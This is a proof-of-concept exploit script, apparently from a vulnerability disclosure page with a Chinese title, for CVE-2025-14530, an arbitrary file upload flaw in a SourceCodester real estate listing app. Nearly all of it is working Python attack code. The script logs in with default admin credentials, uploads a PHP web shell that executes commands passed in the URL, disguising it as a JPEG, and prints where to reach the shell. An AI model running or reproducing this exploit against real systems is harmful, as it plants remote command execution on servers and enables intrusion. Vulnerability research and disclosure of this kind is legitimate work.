CVE-2025-14530 SourceCodester房产列表应用任意文件上传漏洞

import requests import sys # CVE-2025-14530 PoC - Arbitrary File Upload in SourceCodester Real Estate Property Listing App 1.0 # Target: /admin/property.php # Vulnerability: Unrestricted file upload via 'image' parameter TARGET_URL = "http://target.com/admin/property.php" UPLOAD_URL = "http://target.com/admin/property.php?action=add" LOGIN_URL = "http://target.com/admin/login.php" # Malicious PHP webshell content webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" def exploit(): """ Exploitation steps: 1. Authenticate to admin panel with valid credentials 2. Upload malicious PHP file disguised as image 3. Access uploaded file to execute commands """ session = requests.Session() # Step 1: Login to admin panel login_data = { 'username': 'admin', 'password': 'admin123' } try: login_response = session.post(LOGIN_URL, data=login_data, timeout=10) if 'dashboard' not in login_response.text.lower(): print("[-] Login failed. Check credentials.") return False print("[+] Login successful") # Step 2: Upload malicious file files = { 'image': ('shell.php', webshell, 'image/jpeg') } data = { 'title': 'Test Property', 'description': 'Test Description', 'price': '100000', 'submit': 'submit' } upload_response = session.post(UPLOAD_URL, files=files, data=data, timeout=10) # Step 3: Extract uploaded file path (may vary based on application logic) # Check response for success message or uploaded file path if upload_response.status_code == 200: print("[+] File upload request sent") print("[*] Check for uploaded shell at: /uploads/shell.php or /admin/uploads/shell.php") print("[*] Access shell: http://target.com/uploads/shell.php?cmd=whoami") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-14530 PoC - Real Estate Property Listing App File Upload") print("=" * 60) exploit()